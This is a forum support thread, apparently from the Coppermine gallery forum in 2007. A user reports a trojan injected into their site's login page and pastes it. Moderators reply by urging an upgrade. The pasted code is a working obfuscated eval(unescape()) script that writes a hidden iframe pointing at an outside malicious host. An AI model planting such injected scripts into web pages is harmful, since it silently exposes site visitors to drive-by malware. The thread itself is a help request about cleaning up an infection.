unautorizied script in LOG IN unautorizied script in LOG IN
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

unautorizied script in LOG IN

Started by Laki, December 22, 2007, 08:24:37 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Laki

I had Trojan virus installed in my Login folder. I removed it, but how to protect it in the future???

Script looks like this:
EOT;

</form>
<script language="javascript" type="text/javascript">
<!--
document.loginbox.username.focus();
-->
</script>


?><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%64%63%31%32%35%65%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%38%37%34%36%30%29%2b%27%37%5c%27%20%77%69%64%74%68%3d%37%32%31%20%68%65%69%67%68%74%3d%32%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Thanx, Laki.

François Keller

what coppermine version do you run ?
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

Laki


Joachim Müller

Always keep your coppermine version (and all other pre-made scripts you have) up-to-date. Most recent stable coppermine release currently is cpg1.4.14. The fact that your site was hacked may be related to your reluctance to upgrade in time. Do upgrade now!

Laki


Joachim Müller

The name is "Joachim". Marking thread as "solved".